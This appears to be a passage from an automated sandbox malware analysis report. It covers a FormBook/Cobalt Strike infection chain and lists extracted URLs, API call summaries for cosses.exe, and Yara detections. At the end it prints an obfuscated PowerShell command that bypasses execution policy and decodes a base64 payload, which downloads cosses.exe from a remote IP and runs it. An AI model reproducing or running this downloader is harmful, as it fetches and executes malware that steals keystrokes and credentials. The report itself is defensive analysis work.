6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                  Source: powershell.exe, 00000003.00000002.1482495416.0000000004B88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.24/530/cosses
                  Source: powershell.exe, 00000003.00000002.1482495416.0000000004B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1495054973.0000000006CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.24/530/cosses.exe
                  Source: powershell.exe, 00000003.00000002.1494979648.0000000006C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.24/530/cosses.exeb
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Artistic.cfm?fp=wS%2FuHL3fYjNx8GVx8TM0P5j3p0gjdgvycqoHxczx5cPnCkE8mXhD1lJ7w
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Asian_Art.cfm?fp=wS%2FuHL3fYjNx8GVx8TM0P5j3p0gjdgvycqoHxczx5cPnCkE8mXhD1lJ7
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Chinese_Art.cfm?fp=wS%2FuHL3fYjNx8GVx8TM0P5j3p0gjdgvycqoHxczx5cPnCkE8mXhD1l
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Online_Art_Galleries.cfm?fp=wS%2FuHL3fYjNx8GVx8TM0P5j3p0gjdgvycqoHxczx5cPnC
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Paint_Pro_Download.cfm?fp=wS%2FuHL3fYjNx8GVx8TM0P5j3p0gjdgvycqoHxczx5cPnCkE
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.3
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28903/search.png)
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/29590/bg1.png)
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                  Source: powershell.exe, 00000003.00000002.1493834556.0000000005840000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000003.00000002.1482495416.0000000004928000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000003.00000002.1482495416.0000000004928000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: powershell.exe, 00000003.00000002.1482495416.00000000047D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000003.00000002.1482495416.0000000004928000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Anartisthuman.info
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.anartisthuman.info/__media__/design/underconstructionnotice.php?d=anartisthuman.info
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 0000000C.00000002.3820883350.00000000081C0000.00000004.00000800.00020000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.anartisthuman.info/__media__/js/trademark.php?d=anartisthuman.info&type=ns
                  Source: powershell.exe, 00000003.00000002.1482495416.0000000004928000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000003.00000002.1496956877.0000000007CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                  Source: hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3819745162.0000000005896000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.teschi.xyz
                  Source: hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3819745162.0000000005896000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.teschi.xyz/61ci/
                  Source: calc.exe, 0000000C.00000003.1868402445.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                  Source: powershell.exe, 00000003.00000002.1482495416.00000000047D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                  Source: powershell.exe, 00000003.00000002.1482495416.0000000004928000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000006DCA000.00000004.10000000.00040000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.000000000492A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://browsehappy.com/
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                  Source: calc.exe, 0000000C.00000003.1868402445.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: calc.exe, 0000000C.00000003.1868402445.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: calc.exe, 0000000C.00000003.1868402445.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: powershell.exe, 00000003.00000002.1493834556.0000000005840000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000003.00000002.1493834556.0000000005840000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000003.00000002.1493834556.0000000005840000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: calc.exe, 0000000C.00000002.3818728051.0000000005FA8000.00000004.10000000.00040000.00000000.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                  Source: hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000002.3817911115.0000000003B08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                  Source: calc.exe, 0000000C.00000003.1868402445.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: calc.exe, 0000000C.00000003.1868402445.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
                  Source: calc.exe, 0000000C.00000003.1868402445.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: calc.exe, 0000000C.00000003.1868402445.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                  Source: powershell.exe, 00000003.00000002.1482495416.0000000004928000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: calc.exe, 0000000C.00000002.3816500953.0000000003405000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                  Source: calc.exe, 0000000C.00000002.3816500953.0000000003429000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                  Source: calc.exe, 0000000C.00000002.3816500953.0000000003405000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                  Source: calc.exe, 0000000C.00000002.3816500953.0000000003405000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033q
                  Source: calc.exe, 0000000C.00000002.3816500953.0000000003405000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                  Source: calc.exe, 0000000C.00000002.3816500953.0000000003405000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                  Source: calc.exe, 0000000C.00000003.1863400796.0000000008449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                  Source: powershell.exe, 00000003.00000002.1496956877.0000000007CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/rShell.dllowsErrorReporting/Microsoft.WindowsErrorRe
                  Source: powershell.exe, 00000003.00000002.1493834556.0000000005840000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: calc.exe, 0000000C.00000003.1868402445.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                  Source: calc.exe, 0000000C.00000003.1868402445.0000000008468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00184164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_00184164
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00184164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_00184164
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00183F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,6_2_00183F66
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0017001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,6_2_0017001C
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0019CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_0019CABC

                  E-Banking Fraud

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.3816264439.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1687105036.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.3817612189.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1684081260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.3819745162.0000000005830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.3817513274.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1687168509.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3817630308.0000000002340000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                  System Summary

                  barindex
                  Detected Cobalt Strike Beacon
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkajE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNC81MzAvY29zc2VzLmV4ZSIsIiRFblY6QVBQREFUQVxjb3NzZXMuZXhlIiwwLDApO3N0YVJ0LVNsRUVQKDMpO2ludk9rZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY29zc2VzLmV4ZSI='+[Char]34+'))')))"
